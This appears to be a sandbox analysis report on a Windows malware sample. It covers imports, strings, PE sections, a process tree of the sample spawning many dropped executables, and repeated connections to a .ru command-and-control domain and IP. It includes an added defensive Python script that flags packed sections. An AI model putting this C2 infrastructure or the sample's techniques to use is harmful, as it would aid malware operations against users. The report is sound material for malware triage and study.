kernel32.dll.CreateMutexW
kernel32.dll.lstrcpyW
kernel32.dll.lstrcatW
kernel32.dll.GetProcAddress
kernel32.dll.LoadLibraryW
kernel32.dll.GetSystemDirectoryW
kernel32.dll.GetModuleHandleW
kernel32.dll.GetCurrentProcess
kernel32.dll.LoadLibraryExW
kernel32.dll.VirtualQuery
kernel32.dll.MultiByteToWideChar
kernel32.dll.lstrlenA
kernel32.dll.lstrlenW
kernel32.dll.ReadFile
kernel32.dll.UnlockFile
kernel32.dll.SetFilePointerEx
kernel32.dll.GetStdHandle
kernel32.dll.LCMapStringW
kernel32.dll.IsDebuggerPresent
kernel32.dll.TlsSetValue
kernel32.dll.TlsGetValue
kernel32.dll.InitializeCriticalSectionAndSpinCount
kernel32.dll.SetUnhandledExceptionFilter
kernel32.dll.UnhandledExceptionFilter
kernel32.dll.GetStringTypeW
kernel32.dll.HeapFree
kernel32.dll.GetModuleHandleExW
kernel32.dll.IsProcessorFeaturePresent
kernel32.dll.IsValidCodePage
kernel32.dll.GetACP
kernel32.dll.GetOEMCP
kernel32.dll.GetCPInfo
kernel32.dll.GetCurrentThreadId
kernel32.dll.WriteConsoleW
user32.dll.SystemParametersInfoW
user32.dll.ReleaseDC
user32.dll.GetDC
user32.dll.wsprintfA
user32.dll.wsprintfW
user32.dll.CreateWindowStationW
user32.dll.SetProcessWindowStation
user32.dll.DrawTextA
user32.dll.DrawTextW
user32.dll.FillRect
user32.dll.GetForegroundWindow
gdi32.dll.SetTextColor
gdi32.dll.DeleteDC
gdi32.dll.GetDeviceCaps
gdi32.dll.GetDIBits
gdi32.dll.SetBkColor
gdi32.dll.SetPixel
gdi32.dll.DeleteObject
gdi32.dll.SelectObject
gdi32.dll.CreateCompatibleDC
gdi32.dll.CreateCompatibleBitmap
gdi32.dll.CreateFontW
gdi32.dll.GetObjectW
gdi32.dll.GetPixel
gdi32.dll.GetStockObject
gdi32.dll.SetBitmapBits
gdi32.dll.CreateBitmap
gdi32.dll.GetBitmapBits
advapi32.dll.GetTokenInformation
advapi32.dll.GetSidSubAuthorityCount
advapi32.dll.GetSidSubAuthority
advapi32.dll.OpenProcessToken
advapi32.dll.GetUserNameW
advapi32.dll.CryptDestroyKey
advapi32.dll.CryptGenKey
advapi32.dll.CryptEncrypt
advapi32.dll.CryptImportKey
advapi32.dll.CryptReleaseContext
advapi32.dll.CryptGetKeyParam
advapi32.dll.CryptAcquireContextW
advapi32.dll.CryptExportKey
advapi32.dll.RegCreateKeyExW
shell32.dll.ShellExecuteExW
shell32.dll.SHGetSpecialFolderPathW
mpr.dll.WNetEnumResourceW
mpr.dll.WNetCloseEnum
mpr.dll.WNetOpenEnumW
wininet.dll.HttpOpenRequestW
wininet.dll.HttpSendRequestW
wininet.dll.InternetConnectW
rpcrt4.dll.NdrClientCall2
ntdll.dll.RtlComputeCrc32
cryptsp.dll.CryptAcquireContextW
advapi32.dll.CryptGenRandom
cryptsp.dll.CryptGenRandom
cryptsp.dll.CryptReleaseContext
cryptsp.dll.CryptGenKey
cryptsp.dll.CryptExportKey
cryptsp.dll.CryptDestroyKey
cryptsp.dll.CryptImportKey
cryptsp.dll.CryptGetKeyParam
cryptsp.dll.CryptEncrypt
user32.dll.LoadStringW
drprov.dll.NPGetCaps
drprov.dll.NPAddConnection
drprov.dll.NPAddConnection3
drprov.dll.NPCancelConnection
drprov.dll.NPGetConnection
drprov.dll.NPGetUniversalName
drprov.dll.NPOpenEnum
drprov.dll.NPEnumResource
drprov.dll.NPCloseEnum
drprov.dll.NPGetResourceParent
drprov.dll.NPGetResourceInformation
ntlanman.dll.NPGetCaps
ntlanman.dll.NPGetUser
ntlanman.dll.NPAddConnection
ntlanman.dll.NPAddConnection3
ntlanman.dll.NPGetReconnectFlags
ntlanman.dll.NPCancelConnection
ntlanman.dll.NPGetConnection
ntlanman.dll.NPGetConnection3
ntlanman.dll.NPGetUniversalName
ntlanman.dll.NPGetConnectionPerformance
ntlanman.dll.NPOpenEnum
ntlanman.dll.NPEnumResource
ntlanman.dll.NPCloseEnum
ntlanman.dll.NPFormatNetworkName
ntlanman.dll.NPGetResourceParent
ntlanman.dll.NPGetResourceInformation
davclnt.dll.NPGetCaps
davclnt.dll.NPGetUser
davclnt.dll.NPAddConnection
davclnt.dll.NPAddConnection3
davclnt.dll.NPCancelConnection
davclnt.dll.NPGetConnection
davclnt.dll.NPGetUniversalName
davclnt.dll.NPOpenEnum
davclnt.dll.NPEnumResource
davclnt.dll.NPCloseEnum
davclnt.dll.NPFormatNetworkName
davclnt.dll.NPGetResourceParent
davclnt.dll.NPGetResourceInformation
advapi32.dll.LookupAccountSidW
sechost.dll.LookupAccountSidLocalW
advapi32.dll.CreateWellKnownSid
rpcrt4.dll.RpcStringBindingComposeW
rpcrt4.dll.RpcBindingFromStringBindingW
rpcrt4.dll.RpcStringFreeW
rpcrt4.dll.RpcBindingSetAuthInfoExW
sechost.dll.LookupAccountNameLocalW
rpcrt4.dll.RpcBindingFree
wkscli.dll.NetWkstaGetInfo
cscapi.dll.CscNetApiGetInterface
netutils.dll.NetApiBufferFree
browcli.dll.NetServerEnum
sechost.dll.OpenSCManagerW
sechost.dll.OpenServiceW
sechost.dll.QueryServiceStatus
sechost.dll.CloseServiceHandle
netutils.dll.NetApiBufferAllocate
ntdll.dll.NtSetInformationFile
mpr.dll.WNetSetLastErrorW
rpcrt4.dll.I_RpcExceptionFilter
C:\Windows\5769805074060605\winsvcs.exe
C:\Users\user\AppData\Local\Temp\2841536727.exe
C:\Users\user\AppData\Local\Temp\3751939260.exe
C:\Users\user\AppData\Local\Temp\1865041414.exe
C:\Users\user\AppData\Local\Temp\2080821079.exe
C:\Users\user\AppData\Local\Temp\1257032286.exe
C:\Users\user\AppData\Local\Temp\1674519319.exe
C:\Users\user\AppData\Local\Temp\3065331339.exe
C:\Users\user\AppData\Local\Temp\3876917383.exe
C:\Users\user\AppData\Local\Temp\2810629864.exe
C:\Users\user\AppData\Local\Temp\3750816931.exe
C:\Users\user\AppData\Local\Temp\1398632723.exe
C:\Users\user\AppData\Local\Temp\4032832645.exe
C:\Users\user\AppData\Local\Temp\1674315261.exe
C:\Users\user\AppData\Local\Temp\2459023548.exe
C:\Users\user\AppData\Local\Temp\3304035876.exe
C:\Users\user\AppData\Local\Temp\2400240831.exe
C:\Users\user\AppData\Local\Temp\2686919881.exe
C:\Users\user\AppData\Local\Temp\2293722122.exe
C:\Users\user\AppData\Local\Temp\1227434603.exe
C:\Users\user\AppData\Local\Temp\2673932424.exe
C:\Windows\806084767800850\winsvcs.exe
C:\Users\user\AppData\Local\Temp\1495120250.exe
C:\Users\user\AppData\Local\Temp\1717238076.exe
608605743
IESQMMUTEX_0_208
650870850508
Global\XlAKFoxSKGOfSGOoSFOOFNOLPE
Global\8B5BA5B9E369250F5F1C.lock

Binary Entropy

PE Information

Image Base 0x00400000
Entry Point 0x00407e9d
Reported Checksum 0x00027747
Actual Checksum 0x00027747
Minimum OS Version 5.1
Compile Time 2017-12-13 13:38:41
Import Hash 7fcc8b9d7ca1591b5c9cd6b043691cb9

Sections

Name Virtual Address Virtual Size Size of Raw Data Characteristics Entropy
.text 0x00001000 0x00019a10 0x00019c00 IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ 6.83
.data 0x0001b000 0x0001fba8 0x00005e00 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE 0.87
.mysec3 0x0003b000 0x00000005 0x00000200 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE 0.00
.mysec 0x0003c000 0x0000100a 0x00000400 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ 0.00
.mysec10 0x0003e000 0x00000064 0x00000200 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE 0.00
.rsrc 0x0003f000 0x00001d62 0x00001e00 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ 5.81
.reloc 0x00041000 0x00000ece 0x00001000 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ 5.91
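The section table is where this sample gives itself away before any dynamic analysis: three sections with made-up names (.mysec3, .mysec, .mysec10), one of them executable without IMAGE_SCN_CNT_CODE and with 0.00 entropy on disk, a .data section whose VirtualSize is more than five times its raw size, and a .text section at 6.83 entropy. The script below is an added example by the editor, not sandbox code: it parses the table exactly as printed above, applies those heuristics, and maps the entry point to its section. The thresholds (6.7 for entropy, 4x for runtime growth) and the finding names are the editor's assumptions, not standard values.

```python
"""Heuristic review of a PE section table as a sandbox report prints it (added example).

Thresholds and finding names are the editor's; treat them as starting points, not rules.
"""
from dataclasses import dataclass

# Section names the usual toolchains emit themselves; anything else is worth a look.
STANDARD_NAMES = {".text", ".data", ".rdata", ".bss", ".idata", ".edata", ".rsrc", ".reloc",
                  ".tls", ".pdata", ".xdata", ".crt", ".debug", ".didat", ".gfids"}
HIGH_ENTROPY = 6.7   # assumed threshold: compiled code usually sits well below this
GROWTH_RATIO = 4.0   # assumed threshold: VirtualSize this many times SizeOfRawData

# Copied from the report's "Sections" table (constructed sample input).
SECTIONS_TABLE = """\
.text 0x00001000 0x00019a10 0x00019c00 IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ 6.83
.data 0x0001b000 0x0001fba8 0x00005e00 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE 0.87
.mysec3 0x0003b000 0x00000005 0x00000200 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE 0.00
.mysec 0x0003c000 0x0000100a 0x00000400 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ 0.00
.mysec10 0x0003e000 0x00000064 0x00000200 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE 0.00
.rsrc 0x0003f000 0x00001d62 0x00001e00 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ 5.81
.reloc 0x00041000 0x00000ece 0x00001000 IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ 5.91
"""
IMAGE_BASE, ENTRY_POINT = 0x00400000, 0x00407e9d   # from the "PE Information" block


@dataclass
class Section:
    name: str
    va: int          # RVA of the section
    vsize: int       # VirtualSize: bytes mapped in memory
    raw: int         # SizeOfRawData: bytes present in the file
    flags: frozenset
    entropy: float


def parse_sections(table):
    sections = []
    for line in table.splitlines():
        parts = line.split()
        if len(parts) != 6:          # skip header / blank lines
            continue
        name, va, vsize, raw, flags, ent = parts
        sections.append(Section(name, int(va, 16), int(vsize, 16), int(raw, 16),
                                frozenset(flags.split("|")), float(ent)))
    return sections


def findings(sec):
    """Heuristic findings for one section; an empty list means nothing odd."""
    f = []
    exe = "IMAGE_SCN_MEM_EXECUTE" in sec.flags
    if sec.name.lower() not in STANDARD_NAMES:
        f.append("nonstandard_name")
    if exe and "IMAGE_SCN_CNT_CODE" not in sec.flags:
        f.append("executable_but_not_marked_code")   # data the loader will map as code
    if exe and "IMAGE_SCN_MEM_WRITE" in sec.flags:
        f.append("writable_and_executable")
    if sec.raw and sec.entropy == 0.0:
        # Every byte on disk is identical: the content is produced at run time.
        f.append("zero_entropy_on_disk_executable" if exe else "zero_entropy_on_disk")
    elif sec.entropy >= HIGH_ENTROPY:
        f.append("high_entropy")
    if sec.raw and sec.vsize > GROWTH_RATIO * sec.raw:
        f.append("grows_at_runtime")                 # room reserved for unpacked data
    return f


def triage(table):
    return {s.name: findings(s) for s in parse_sections(table)}


def section_for_rva(sections, rva):
    for s in sections:
        if s.va <= rva < s.va + max(s.vsize, s.raw):
            return s.name
    return None


def entry_section(table=SECTIONS_TABLE, image_base=IMAGE_BASE, entry_point=ENTRY_POINT):
    return section_for_rva(parse_sections(table), entry_point - image_base)


if __name__ == "__main__":
    for name, found in triage(SECTIONS_TABLE).items():
        print(f"{name:<9} {', '.join(found) or 'ok'}")
    print("entry point in", entry_section())
```

On this table the entry point still resolves to .text, so the first-stage code is real code rather than a stub that jumps into .mysec; the zero-entropy executable section is the place to watch for a runtime write (VirtualProtect is in the import table) when the sample is run under a debugger.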

Imports

Library KERNEL32.dll:
0x401000 LocalFree
0x401004 GetLastError
0x401008 AddAtomW
0x401010 ExitProcess
0x401014 AddAtomA
0x401018 SetLastError
0x401020 GetStartupInfoA
0x401024 VirtualProtect
0x401028 GetProcAddress
0x40102c LoadLibraryA
0x401030 GetACP
0x401034 GlobalMemoryStatus
0x401038 GetCPInfo
0x40103c GetSystemTimes
0x401044 GetTickCount
0x401048 GetModuleHandleW
0x40104c EnumSystemLocalesA
0x401050 GetLocaleInfoA
0x401054 GetCommandLineA
0x401058 HeapSetInformation
0x40105c GetStartupInfoW
0x401064 EncodePointer
0x401068 DecodePointer
0x40106c HeapFree
0x401070 TlsAlloc
0x401074 TlsGetValue
0x401078 TlsSetValue
0x40107c TlsFree
0x401084 GetCurrentThreadId
0x40108c GetCurrentThread
0x401094 WriteFile
0x401098 GetStdHandle
0x40109c GetModuleFileNameW
0x4010a0 GetModuleFileNameA
0x4010a8 WideCharToMultiByte
0x4010b0 SetHandleCount
0x4010b8 GetFileType
0x4010c0 HeapCreate
0x4010c4 HeapDestroy
0x4010cc GetCurrentProcessId
0x4010d4 RaiseException
0x4010d8 GetOEMCP
0x4010dc IsValidCodePage
0x4010e4 IsDebuggerPresent
0x4010e8 TerminateProcess
0x4010ec GetCurrentProcess
0x4010f4 FatalAppExitA
0x4010fc Sleep
0x401104 FreeLibrary
0x401108 InterlockedExchange
0x40110c LoadLibraryW
0x401110 GetLocaleInfoW
0x401114 RtlUnwind
0x401118 LCMapStringW
0x40111c MultiByteToWideChar
0x401120 GetStringTypeW
0x401124 HeapAlloc
0x401128 HeapReAlloc
0x40112c HeapSize
0x401130 GetUserDefaultLCID
0x401134 IsValidLocale
Library USER32.dll:
0x40113c PeekMessageA

.text
`.data
.mysec3
.mysec
`.mysec10d
.rsrc
@.reloc
GlobalAlloc
kernel32.dll
@Module32FirstW
CreateToolhelp32Snapshot
floor
exp10
?acos
log10
e+000
FlsFree
FlsSetValue
FlsGetValue
FlsAlloc
CorExitProcess
_nextafter
_logb
frexp
_hypot
_cabs
ldexp
atan2
HH:mm:ss
dddd, MMMM dd, yyyy
MM/dd/yy
December
November
October
September
August
April
March
February
January
Saturday
Friday
Thursday
Wednesday
Tuesday
Monday
Sunday
SystemFunction036
GetProcessWindowStation
GetUserObjectInformationW
GetLastActivePopup
GetActiveWindow
MessageBoxW
LC_TIME
LC_NUMERIC
LC_MONETARY
LC_CTYPE
LC_COLLATE
LC_ALL
1#QNAN
1#INF
1#IND
1#SNAN
united-states
united-kingdom
trinidad & tobago
south-korea
south-africa
south korea
south africa
slovak
puerto-rico
pr-china
pr china
new-zealand
hong-kong
holland
great britain
england
czech
china
britain
america
swiss
swedish-finland
spanish-venezuela
spanish-uruguay
spanish-puerto rico
spanish-peru
spanish-paraguay
spanish-panama
spanish-nicaragua
spanish-modern
spanish-mexican
spanish-honduras
spanish-guatemala
spanish-el salvador
spanish-ecuador
spanish-dominican republic
spanish-costa rica
spanish-colombia
spanish-chile
spanish-bolivia
spanish-argentina
portuguese-brazilian
norwegian-nynorsk
norwegian-bokmal
norwegian
italian-swiss
irish-english
german-swiss
german-luxembourg
german-lichtenstein
german-austrian
french-swiss
french-luxembourg
french-canadian
french-belgian
english-usa
english-us
english-uk
english-trinidad y tobago
english-south africa
english-nz
english-jamaica
english-ire
english-caribbean
english-can
english-belize
english-aus
english-american
dutch-belgian
chinese-traditional
chinese-singapore
chinese-simplified
chinese-hongkong
chinese
canadian
belgian
australian
american-english
american english
american
Norwegian-Nynorsk
#6*?.
65/%6
&3+726
&62-9$/
#"6.;
=+6))
(>9=8
8$>$>
;).,/
YQPVh
SVWUj
QW@Ph
LocalFree
GetLastError
AddAtomW
GetCurrentDirectoryA
ExitProcess
AddAtomA
SetLastError
GetProcessShutdownParameters
GetStartupInfoA
VirtualProtect
GetProcAddress
LoadLibraryA
GetACP
GlobalMemoryStatus
GetCPInfo
GetSystemTimes
FillConsoleOutputCharacterW
GetTickCount
GetModuleHandleW
KERNEL32.dll
PeekMessageA
USER32.dll
GetCommandLineA
HeapSetInformation
GetStartupInfoW
IsProcessorFeaturePresent
EncodePointer
DecodePointer
HeapFree
TlsAlloc
TlsGetValue
TlsSetValue
TlsFree
InterlockedIncrement
GetCurrentThreadId
InterlockedDecrement
GetCurrentThread
SetUnhandledExceptionFilter
WriteFile
GetStdHandle
GetModuleFileNameW
GetModuleFileNameA
FreeEnvironmentStringsW
WideCharToMultiByte
GetEnvironmentStringsW
SetHandleCount
InitializeCriticalSectionAndSpinCount
GetFileType
DeleteCriticalSection
HeapCreate
HeapDestroy
QueryPerformanceCounter
GetCurrentProcessId
GetSystemTimeAsFileTime
RaiseException
GetOEMCP
IsValidCodePage
UnhandledExceptionFilter
IsDebuggerPresent
TerminateProcess
GetCurrentProcess
LeaveCriticalSection
FatalAppExitA
EnterCriticalSection
Sleep
SetConsoleCtrlHandler
FreeLibrary
InterlockedExchange
LoadLibraryW
GetLocaleInfoW
RtlUnwind
LCMapStringW
MultiByteToWideChar
GetStringTypeW
HeapAlloc
HeapReAlloc
HeapSize
GetUserDefaultLCID
GetLocaleInfoA
EnumSystemLocalesA
IsValidLocale
dizerafasuma
tevakuvokogumiwubotahutucozame
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
Yubokejuni. Kudihube kopukafoloze pi yiwa yayeha. Cubenegi jugudanepi kotigo di muwusocudiwuze. Mikeva sohirova.Tuya. Dolezosiwa yu humunicidu ladipibawe. Sa cavawice wecotuwijaharo rajuco. Zi bubajocejeda macaviye yojelefuwa hokenonohu. Wumipu tedi mabozodeseyile meje vuxotipufiteyi. Yapelitaya. Zukesi. Javobohisabiyo hoxu cojanu kazaha. Vi wexe peniwanegi. Kicudo (
6$7(7074787<7
X>\>`>d>h>l>p>t>x>|>
kernel32.dll
KERNEL32.DLL
mscoree.dll
runtime error
@Microsoft Visual C++ Runtime Library
<program name unknown>
Program:
HH:mm:ss
dddd, MMMM dd, yyyy
MM/dd/yy
December
November
October
September
August
April
March
February
January
Saturday
Friday
Thursday
Wednesday
Tuesday
Monday
Sunday
ADVAPI32.DLL
WUSER32.DLL
Kesodoxofezavu
VS_VERSION_INFO
StringFileInfo
457aa56b
FileVersion
3.4.6.86
InternalName
mukuge.exe
LegalCopyright
Copyright (C) 2018, vasupejen
ProductVersion
3.4.6.86
VarFileInfo
Translation
This file is not on VirusTotal.

Process Tree


4X6zg5pg.exe, PID: 2992, Parent PID: 2480
Full Path: C:\Users\user\AppData\Local\Temp\4X6zg5pg.exe
Command Line: "C:\Users\user\AppData\Local\Temp\4X6zg5pg.exe"
    winsvcs.exe, PID: 2912, Parent PID: 2992
    Full Path: C:\Windows\5769805074060605\winsvcs.exe
    Command Line: C:\Windows\5769805074060605\winsvcs.exe
        2841536727.exe, PID: 2744, Parent PID: 2912
        Full Path: C:\Users\user\AppData\Local\Temp\2841536727.exe
        Command Line: C:\Users\user\AppData\Local\Temp\2841536727.exe
            winsvcs.exe, PID: 1340, Parent PID: 2744
            Full Path: C:\Windows\806084767800850\winsvcs.exe
            Command Line: C:\Windows\806084767800850\winsvcs.exe
                1495120250.exe, PID: 2956, Parent PID: 1340
                Full Path: C:\Users\user\AppData\Local\Temp\1495120250.exe
                Command Line: C:\Users\user\AppData\Local\Temp\1495120250.exe
                1717238076.exe, PID: 1352, Parent PID: 1340
                Full Path: C:\Users\user\AppData\Local\Temp\1717238076.exe
                Command Line: C:\Users\user\AppData\Local\Temp\1717238076.exe
        3751939260.exe, PID: 2572, Parent PID: 2912
        Full Path: C:\Users\user\AppData\Local\Temp\3751939260.exe
        Command Line: C:\Users\user\AppData\Local\Temp\3751939260.exe
        1865041414.exe, PID: 2884, Parent PID: 2912
        Full Path: C:\Users\user\AppData\Local\Temp\1865041414.exe
        Command Line: C:\Users\user\AppData\Local\Temp\1865041414.exe
        2080821079.exe, PID: 1132, Parent PID: 2912
        Full Path: C:\Users\user\AppData\Local\Temp\2080821079.exe
        Command Line: C:\Users\user\AppData\Local\Temp\2080821079.exe
        1257032286.exe, PID: 2332, Parent PID: 2912
        Full Path: C:\Users\user\AppData\Local\Temp\1257032286.exe
        Command Line: C:\Users\user\AppData\Local\Temp\1257032286.exe
        1674519319.exe, PID: 2528, Parent PID: 2912
        Full Path: C:\Users\user\AppData\Local\Temp\1674519319.exe
        Command Line: C:\Users\user\AppData\Local\Temp\1674519319.exe
        3065331339.exe, PID: 2436, Parent PID: 2912
        Full Path: C:\Users\user\AppData\Local\Temp\3065331339.exe
        Command Line: C:\Users\user\AppData\Local\Temp\3065331339.exe
        3876917383.exe, PID: 3008, Parent PID: 2912
        Full Path: C:\Users\user\AppData\Local\Temp\3876917383.exe
        Command Line: C:\Users\user\AppData\Local\Temp\3876917383.exe
        2810629864.exe, PID: 2208, Parent PID: 2912
        Full Path: C:\Users\user\AppData\Local\Temp\2810629864.exe
        Command Line: C:\Users\user\AppData\Local\Temp\2810629864.exe
        3750816931.exe, PID: 2924, Parent PID: 2912
        Full Path: C:\Users\user\AppData\Local\Temp\3750816931.exe
        Command Line: C:\Users\user\AppData\Local\Temp\3750816931.exe
        1398632723.exe, PID: 2604, Parent PID: 2912
        Full Path: C:\Users\user\AppData\Local\Temp\1398632723.exe
        Command Line: C:\Users\user\AppData\Local\Temp\1398632723.exe
        4032832645.exe, PID: 2420, Parent PID: 2912
        Full Path: C:\Users\user\AppData\Local\Temp\4032832645.exe
        Command Line: C:\Users\user\AppData\Local\Temp\4032832645.exe
        1674315261.exe, PID: 1356, Parent PID: 2912
        Full Path: C:\Users\user\AppData\Local\Temp\1674315261.exe
        Command Line: C:\Users\user\AppData\Local\Temp\1674315261.exe
        2459023548.exe, PID: 1304, Parent PID: 2912
        Full Path: C:\Users\user\AppData\Local\Temp\2459023548.exe
        Command Line: C:\Users\user\AppData\Local\Temp\2459023548.exe
        3304035876.exe, PID: 1936, Parent PID: 2912
        Full Path: C:\Users\user\AppData\Local\Temp\3304035876.exe
        Command Line: C:\Users\user\AppData\Local\Temp\3304035876.exe
        2400240831.exe, PID: 2620, Parent PID: 2912
        Full Path: C:\Users\user\AppData\Local\Temp\2400240831.exe
        Command Line: C:\Users\user\AppData\Local\Temp\2400240831.exe
        2686919881.exe, PID: 224, Parent PID: 2912
        Full Path: C:\Users\user\AppData\Local\Temp\2686919881.exe
        Command Line: C:\Users\user\AppData\Local\Temp\2686919881.exe
        2293722122.exe, PID: 2392, Parent PID: 2912
        Full Path: C:\Users\user\AppData\Local\Temp\2293722122.exe
        Command Line: C:\Users\user\AppData\Local\Temp\2293722122.exe
        1227434603.exe, PID: 2932, Parent PID: 2912
        Full Path: C:\Users\user\AppData\Local\Temp\1227434603.exe
        Command Line: C:\Users\user\AppData\Local\Temp\1227434603.exe
        2673932424.exe, PID: 2396, Parent PID: 2912
        Full Path: C:\Users\user\AppData\Local\Temp\2673932424.exe
        Command Line: C:\Users\user\AppData\Local\Temp\2673932424.exe

Hosts

Direct IP Country Name
N 92.63.197.48 [VT] Russian Federation
Y 8.8.8.8 [VT] United States

TCP

Source Source Port Destination Destination Port
192.168.35.21 49169 92.63.197.48 slpsrgpsrhojifdij.ru 80
192.168.35.21 49170 92.63.197.48 slpsrgpsrhojifdij.ru 80
192.168.35.21 49171 92.63.197.48 slpsrgpsrhojifdij.ru 80
192.168.35.21 49172 92.63.197.48 slpsrgpsrhojifdij.ru 80
192.168.35.21 49178 92.63.197.48 slpsrgpsrhojifdij.ru 80
192.168.35.21 49179 92.63.197.48 slpsrgpsrhojifdij.ru 80
192.168.35.21 49181 92.63.197.48 slpsrgpsrhojifdij.ru 80
192.168.35.21 49188 92.63.197.48 slpsrgpsrhojifdij.ru 80
192.168.35.21 49190 92.63.197.48 slpsrgpsrhojifdij.ru 80
192.168.35.21 49191 92.63.197.48 slpsrgpsrhojifdij.ru 80
192.168.35.21 49196 92.63.197.48 slpsrgpsrhojifdij.ru 80
192.168.35.21 49197 92.63.197.48 slpsrgpsrhojifdij.ru 80
192.168.35.21 49200 92.63.197.48 slpsrgpsrhojifdij.ru 80
192.168.35.21 49207 92.63.197.48 slpsrgpsrhojifdij.ru 80
192.168.35.21 49209 92.63.197.48 slpsrgpsrhojifdij.ru 80
192.168.35.21 49217 92.63.197.48 slpsrgpsrhojifdij.ru 80
192.168.35.21 49221 92.63.197.48 slpsrgpsrhojifdij.ru 80
192.168.35.21 49225 92.63.197.48 slpsrgpsrhojifdij.ru 80
192.168.35.21 49230 92.63.197.48 slpsrgpsrhojifdij.ru 80
192.168.35.21 49232 92.63.197.48 slpsrgpsrhojifdij.ru 80
192.168.35.21 49234 92.63.197.48 slpsrgpsrhojifdij.ru 80
192.168.35.21 49239 92.63.197.48 slpsrgpsrhojifdij.ru 80
192.168.35.21 49242 92.63.197.48 slpsrgpsrhojifdij.ru 80
192.168.35.21 49247 92.63.197.48 slpsrgpsrhojifdij.ru 80
192.168.35.21 49249 92.63.197.48 slpsrgpsrhojifdij.ru 80
192.168.35.21 49251 92.63.197.48 slpsrgpsrhojifdij.ru 80
192.168.35.21 49256 92.63.197.48 slpsrgpsrhojifdij.ru 80
192.168.35.21 49258 92.63.197.48 slpsrgpsrhojifdij.ru 80
192.168.35.21 49298 92.63.197.48 slpsrgpsrhojifdij.ru 80
192.168.35.21 49305 92.63.197.48 slpsrgpsrhojifdij.ru 80
192.168.35.21 49348 92.63.197.48 slpsrgpsrhojifdij.ru 80
192.168.35.21 49393 92.63.197.48 slpsrgpsrhojifdij.ru 80
192.168.35.21 49513 92.63.197.48 slpsrgpsrhojifdij.ru 80

UDP

Source Source Port Destination Destination Port
192.168.35.21 49407 8.8.8.8 53
192.168.35.21 49793 8.8.8.8 53
192.168.35.21 50026 8.8.8.8 53
192.168.35.21 50105 8.8.8.8 53
192.168.35.21 50506 8.8.8.8 53
192.168.35.21 50603 8.8.8.8 53
192.168.35.21 51201 8.8.8.8 53
192.168.35.21 51369 8.8.8.8 53
192.168.35.21 51900 8.8.8.8 53
192.168.35.21 51910 8.8.8.8 53
192.168.35.21 51968 8.8.8.8 53
192.168.35.21 52399 8.8.8.8 53
192.168.35.21 52471 8.8.8.8 53
192.168.35.21 52956 8.8.8.8 53
192.168.35.21 53447 8.8.8.8 53
192.168.35.21 54169 8.8.8.8 53
192.168.35.21 54941 8.8.8.8 53
192.168.35.21 55165 8.8.8.8 53
192.168.35.21 55192 8.8.8.8 53
192.168.35.21 56004 8.8.8.8 53
192.168.35.21 56514 8.8.8.8 53
192.168.35.21 56531 8.8.8.8 53
192.168.35.21 57255 8.8.8.8 53
192.168.35.21 57334 8.8.8.8 53
192.168.35.21 58094 8.8.8.8 53
192.168.35.21 58453 8.8.8.8 53
192.168.35.21 59473 8.8.8.8 53
192.168.35.21 59742 8.8.8.8 53
192.168.35.21 61115 8.8.8.8 53
192.168.35.21 63030 8.8.8.8 53
192.168.35.21 63148 8.8.8.8 53
192.168.35.21 63336 8.8.8.8 53
192.168.35.21 64235 8.8.8.8 53
192.168.35.21 64292 8.8.8.8 53
192.168.35.21 64523 8.8.8.8 53
192.168.35.21 64801 8.8.8.8 53
192.168.35.21 64869 8.8.8.8 53
192.168.35.21 64891 8.8.8.8 53
192.168.35.21 64992 8.8.8.8 53
192.168.35.21 65365 8.8.8.8 53
192.168.35.21 65426 8.8.8.8 53

DNS

Name Response Post-Analysis Lookup
slpsrgpsrhojifdij.ru [VT] A 92.63.197.48 [VT]
osheoufhusheoghuesd.ru [VT] NXDOMAIN [VT]
ofheofosugusghuhush.ru [VT]
suieiusiueiuiuushgf.ru [VT]
fuiueufiiehfueghuhf.ru [VT]
sisoefjsuhuhaudhhed.ru [VT]
opllforgirsoofuhohu.ru [VT]
eooeoeooejesfiehfii.ru [VT]
oefosfishiudhiusegf.ru [VT]
aaeiauebfaneifuaeif.ru [VT]
naibfiahdiauehihhre.ru [VT]
auaeuiihaehifhahaud.ru [VT]
oieoaidhhaidhiehheg.ru [VT]
fisiuuiedesubdibesd.ru [VT]
efiiuehdiahiuediaug.ru [VT]
sfiushidhseiugiuseh.ru [VT]
oeiieieisijdingisgf.ru [VT]
aiisiaueuefiuhiehgu.ru [VT]
sfsiuhieghaughaoeho.ru [VT]
hpptlhptdkoodsokdke.ru [VT]
eneebgieeiieieiddrt.ru [VT]
eniaebivaiebifaibef.ru [VT]
mmginsiridnsinnsgir.ru [VT]
gmndaudnahgahghaohh.ru [VT]
aefaidihabevbabifba.ru [VT]
rgijirshisjriijdijh.ru [VT]
aiehazegfageigfzgei.ru [VT]
foaeodheuabguaegubr.ru [VT]
guhaohadueoanavbvbf.ru [VT]
orsodaououaebufbeob.ru [VT]
eaiiakeiohoueghoaur.ru [VT]
naiebiaifzgfaezgdzr.ru [VT]
gaeuhdobaoebuagoaoe.ru [VT]
giuahfoaoeubfouaena.ru [VT]
